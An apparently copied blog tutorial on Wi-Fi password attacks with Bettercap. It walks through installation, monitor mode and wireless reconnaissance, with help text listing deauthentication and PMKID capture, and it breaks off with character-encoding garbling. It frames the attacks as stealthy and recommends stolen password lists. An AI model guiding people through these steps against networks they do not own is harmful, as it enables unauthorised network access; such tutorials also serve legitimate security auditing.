There are many tools out there forΒ Wi-Fi hacking, but few are as integrated and well-rounded as Bettercap. Thanks to an impressively simple interface that works even over SSH, itβs easy to access many of the most powerful Wi-Fi attacks available from anywhere. To capture handshakes from both attended and unattended Wi-Fi networks, weβll use two of Bettercapβs modules to help us search for weak Wi-Fi passwords. also check how to hack wifii with wifite
The idea of organizing tools into useful frameworks isnβt new, but there are many ways of doing it. Frameworks likeΒ AirgeddonΒ include an incredible amount of bleeding-edge Wi-Fi hacking tools but cannot be used over a command line. Thatβs because Airgeddon requires the ability to open new windows for different tools to run, so if youβre communicating with aΒ Raspberry PiΒ over SSH, you can forget launching many Wi-Fi hacking tools.
Bettercap allows access to the tools needed to swiftly scout for targets, designate one, and grab a WPA handshake to brute-force. While we wonβt be working with any WPS recon modules today, our setup will allow you to audit for weak WPA passwords with ease. The way Bettercap is organized allows for anyone within proximity of a target to probe for weak WPA passwords while staying stealthy and undetected.
WPA Hacking with Bettercap
Bettercap is described as the Swiss Army knife of wireless hacking. To that end, it has a lot of modules for sniffing networks after you connect to them, as well asΒ other modules looking at Bluetooth devices. The most straightforward use of Bettercap is to use the scanning and recon modules to identify nearby targets to direct attacks at, then attempt to identify networks with weak passwords after capturing the necessary information.
Our targets, in this case, will be two kinds of networks: attended and unattended. Attended networks are easier to attack, and a larger number of tools will work against them. With an attended network, there are people actively using it to download files, watch Netflix, or browse the internet. We can count on there being devices to kick off the network that will give us the information we need to try to crack the password.
Unattended networks are trickier to target. Because they do not have devices with an active data connection on them to disconnect, these networks were typically unable to yield the information needed to audit for a weak password. With the PMKID approach to cracking WPA passwords, thatβs no longer the case. The tool is integrated as one of the Wi-Fi hacking modules and makes it even easier to attack.
Brute-Forcing Power Work arounds
Bettercap doesnβt directly break the passwords of networks it targets, but it would be impossible to do so without the information Bettercap provides. Once a handshake is captured, youβll need to use a brute-forcing tool likeΒ HydraΒ orΒ Aircrack-ngΒ to try a list of common passwords against the hash youβve captured. How quickly it will happen depends on a few factors.
The first is whether the password used to secure the target network is in the password list youβre using at all. If it isnβt, this attack wonβt succeed, so itβs essential to use lists of real stolen passwords or customized password generators likeΒ CUPP. If you donβt believe that brute-force attacks are still effective, youβd be surprised to learn thatΒ any eight-character password can be brute-forced in a little over two hours.
Another workaround to using a device like aΒ Raspberry Pi for Wi-Fi hackingΒ is to upload the WPA handshake to a cracking service or network. Many hackersΒ use networks that distribute the cracking loadΒ among volunteer βworkerβ computers, which lets the group crack WPA handshakes that less powerful devices can gather.
If you were to run Bettercap on a Raspberry Pi and then upload the captured handshakes to a distributed WPA cracker, you would be able to crack passwords within mere minutes. Alternatively, you could set this up yourself if you have a computer with a powerful processor and GPU.
What Youβll Need
To follow this guide, youβll need a wireless network card you can put into wireless monitor mode.Β Your computer may have an internal card that supports wireless monitor mode, but youβll need to be running Linux to work with it. You can refer toΒ our other guideΒ to find out if your existing card will work.
You can follow our guide today with Kali Linux on your laptop, a Raspberry Pi running Kali Linux, or even Ubuntu with some additional installation. For best results, you should use Kali Linux, because Bettercap comes preinstalled.
Step 1Install Bettercap
If you have Kali Linux installed, you can find it in the βSniffing & Spoofingβ folder in the βApplicationsβ menu or from a search.
Bettercap screenshot
If you donβt have Bettercap, the documentation for the project is onΒ the Bettercap website. If youβre running Kali, you can runΒ apt install bettercapΒ to add it, as seen below. Then, you can locate the tool as seen above.
~# apt install bettercap
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following package was automatically installed and is no longer required:
liblinear3
Use 'apt autoremove' to remove it.
The following additional packages will be installed:
bettercap-caplets
Suggested packages:
bettercap-ui
The following NEW packages will be installed:
bettercap bettercap-caplets
0 upgraded, 2 newly installed, 0 to remove and 1854 not upgraded.
Need to get 6,931 kB of archives.
After this operation, 25.8 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 bettercap amd64 2.26.1-0kali1 [6,821 kB]
Get:2 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 bettercap-caplets all 0+git20191009-0kali1 [110 kB]
Fetched 6,931 kB in 3s (2,332 kB/s)
Selecting previously unselected package bettercap.
(Reading database ... 417705 files and directories currently installed.)
Preparing to unpack .../bettercap_2.26.1-0kali1_amd64.deb ...
Unpacking bettercap (2.26.1-0kali1) ...
Selecting previously unselected package bettercap-caplets.
Preparing to unpack .../bettercap-caplets_0+git20191009-0kali1_all.deb ...
Unpacking bettercap-caplets (0+git20191009-0kali1) ...
Setting up bettercap-caplets (0+git20191009-0kali1) ...
Setting up bettercap (2.26.1-0kali1) ...
bettercap.service is a disabled or a static unit, not starting it.
If youβre not running Kali, youβll need to refer toΒ Bettercapβs more complicated setup. If youβre on a Mac, you can do network recon, but the modules Iβm writing about wonβt work. Still, you can check out other features by installing it withΒ Homebrew, using the commandΒ brew install bettercap.
Step 2Launch Bettercap
When ready, click on Bettercapβs icon to launch it. You should see the following help menu in a terminal window, although the tool will not automatically start.
Usage of bettercap:
-autostart string
Comma separated list of modules to auto start. (default "events.stream")
-caplet string
Read commands from this file and execute them in the interactive session.
-cpu-profile file
Write cpu profile file.
-debug
Print debug messages.
-env-file string
Load environment variables from this file if found, set to empty to disable environment persistence.
-eval string
Run one or more commands separated by ; in the interactive session, used to set variables via command line.
-gateway-override string
Use the provided IP address instead of the default gateway. If not specified or invalid, the default gateway will be used.
-iface string
Network interface to bind to, if empty the default interface will be auto selected.
-mem-profile file
Write memory profile to file.
-no-colors
Disable output color effects.
-no-history
Disable interactive session history file.
-silent
Suppress all logs which are not errors.
-version
Print the version and exit.
Here, we can see the arguments we can start Bettercap with. One of the most useful of these isΒ -ifaceΒ which allows us to define which interface to work with. If we have an external wireless network adapter, weβll need to define it with that.
Step 3Connect Your Network Adapter & Start
Now, weβll need to put our card into monitor mode. If weβre connected to a Wi-Fi network already, Bettercap will start sniffing that network instead, so monitor mode always comes first.
Locate your card withΒ ifconfigΒ orΒ ip aΒ to find the name of your network adapter. It should be something likeΒ wlan0Β for your internal adapter andΒ wlan1Β for your USB network adapter.
Take the adapter thatβs monitor mode-compatible, andΒ switch it to monitor modeΒ by opening a terminal window and typingΒ airmon-ng start wlan1, withΒ wlan1Β substituted with the name of your network adapter.
~# airmon-ng start wlan1
Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
559 NetworkManager
621 wpa_supplicant
14785 dhclient
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
phy3 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy3]wlan1 on [phy3]wlan1mon)
(mac80211 station mode vif disabled for [phy3]wlan1)
You can then typeΒ ifconfigΒ orΒ ip aΒ again to verify it started.
After making sure that your wireless card is in monitor mode, you can start Bettercap by typingΒ sudo bettercap βiface wlan1monΒ in a new terminal window, substituting the βwlan1β portion with your cardβs name.
~# sudo bettercap --iface wlan1mon
bettercap v2.24.1 (built for linux amd64 with go1.12.7) [type 'help' for a list of commands]
wlan1 Β»
Once Bettercap opens, typeΒ helpΒ to see a list of all the modules running and commands. In the modules, you can see that the Wi-Fi module is not started by default.
wlan1 Β» help
help MODULE : List available commands or show module specific help if no module name is provided.
active : Show information about active modules.
quit : Close the session and exit.
sleep SECONDS : Sleep for the given amount of seconds.
get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
set NAME VALUE : Set the VALUE of variable NAME.
read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
clear : Clear the screen.
include CAPLET : Load and run this caplet in the current session.
! COMMAND : Execute a shell command and print its output.
alias MAC NAME : Assign an alias to a given endpoint given its MAC address.
Modules
any.proxy > not running
api.rest > not running
arp.spoof > not running
ble.recon > not running
caplets > not running
dhcp6.spoof > not running
dns.spoof > not running
events.stream > running
gps > not running
http.proxy > not running
http.server > not running
https.proxy > not running
https.server > not running
mac.changer > not running
mysql.server > not running
net.probe > not running
net.recon > running
net.sniff > not running
packet.proxy > not running
syn.scan > not running
tcp.proxy > not running
ticker > not running
update > not running
wifi > not running
wol > not running
Step 4Scan for Nearby Networks
To get started, letβs look at the commands we can issue under the Wi-Fi module. We can see this information by typingΒ help wifiΒ into Bettercap.
wlan1 Β» help wifi
wifi (running): A module to monitor and perform wireless attacks on 802.11.
wifi.recon on : Start 802.11 wireless base stations discovery and channel hopping.
wifi.recon off : Stop 802.11 wireless base stations discovery and channel hopping.
wifi.clear : Clear all access points collected by the WiFi discovery module.
wifi.recon MAC : Set 802.11 base station address to filter for.
wifi.recon clear : Remove the 802.11 base station filter.
wifi.deauth BSSID : Start a 802.11 deauth attack, if an access point BSSID is provided, every client will be deauthenticated, otherwise only the selected client. Use 'all', '*' or a broadcast BSSID (ff:ff:ff:ff:ff:ff) to iterate every access point with at least one client and start a deauth attack for each one.
wifi.assoc BSSID : Send an association request to the selected BSSID in order to receive a RSN PMKID key. Use 'all', '*' or a broadcast BSSID (ff:ff:ff:ff:ff:ff) to iterate for every access point.
wifi.ap : Inject fake management beacons in order to create a rogue access point.
wifi.show.wps BSSID : Show WPS information about a given station (use 'all', '*' or a broadcast BSSID for all).
wifi.show : Show current wireless stations list (default sorting by essid).
wifi.recon.channel : WiFi channels (comma separated) or 'clear' for channel hopping.
Parameters
wifi.ap.bssid : BSSID of the fake access point. (default=<random mac>)
wifi.ap.channel : Channel of the fake access point. (default=1)
wifi.ap.encryption : If true, the fake access point will use WPA2, otherwise it'll result as an open AP. (default=true)
wifi.ap.ssid : SSID of the fake access point. (default=FreeWiFi)
wifi.assoc.open : Send association requests to open networks. (default=false)
wifi.assoc.silent : If true, messages from wifi.assoc will be suppressed. (default=false)
wifi.assoc.skip : Comma separated list of BSSID to skip while sending association requests. (default=)
wifi.deauth.open : Send wifi deauth packets to open networks. (default=true)
wifi.deauth.silent : If true, messages from wifi.deauth will be suppressed. (default=false)
wifi.deauth.skip : Comma separated list of BSSID to skip while sending deauth packets. (default=)
wifi.handshakes.file : File path of the pcap file to save handshakes to. (default=~/bettercap-wifi-handshakes.pcap)
wifi.hop.period : If channel hopping is enabled (empty wifi.recon.channel), this is the time in milliseconds the algorithm will hop on every channel (it'll be doubled if both 2.4 and 5.0 bands are available). (default=250)
wifi.region : Set the WiFi region to this value before activating the interface. (default=BO)
wifi.rssi.min : Minimum WiFi signal strength in dBm. (default=-200)
wifi.show.filter : Defines a regular expression filter for wifi.show (default=)
wifi.show.limit : Defines limit for wifi.show (default=0)
wifi.show.sort : Defines sorting field (rssi, bssid, essid, channel, encryption, clients, seen, sent, rcvd) and direction (asc or desc) for wifi.show (default=rssi asc)
wifi.skip-broken : If true, dot11 packets with an invalid checksum will be skipped. (default=true)
wifi.source.file : If set, the wifi module will read from this pcap file instead of the hardware interface. (default=)
wifi.txpower : Set WiFi transmission power to this value before activating the interface. (default=30)
Here, we can see lots of options! For our purposes, weβll be selecting the Wi-Fi recon module. To start it, typeΒ wifi.recon onΒ into Bettercap. Youβll begin to get a flood of messages as soon as networks start to be detected. If this gets overwhelming, you can typeΒ events.stream offΒ to mute the alerts.
wlan1 Β» wifi.recon on
[23:01:35] [sys.log] [inf] wifi WiFi region set to 'BO'
[23:01:35] [sys.log] [inf] wifi interface wlan1 txpower set to 30
[23:01:35] [sys.log] [inf] wifi started (min rssi: -200 dBm)
wlan1 Β» [23:01:35] [sys.log] [inf] wifi channel hopper started
wlan1 Β» [23:01:35] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:35] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:35] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:36] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:36] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:36] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:36] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:37] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:37] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:37] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:37] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:38] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:38] [wifi.client.new] new station ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:38] [wifi.client.new] new station ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:39] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:39] [wifi.client.new] new station ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:39] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:41] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:41] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:41] [wifi.client.new] new station ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:42] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:42] [wifi.client.new] new station ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:42] [wifi.client.new] new station ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:42] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
wlan1 Β» [23:01:42] [wifi.ap.new] wifi access point ββββββββββββββββββββββββββββββ βββββββββββββ
Add Comment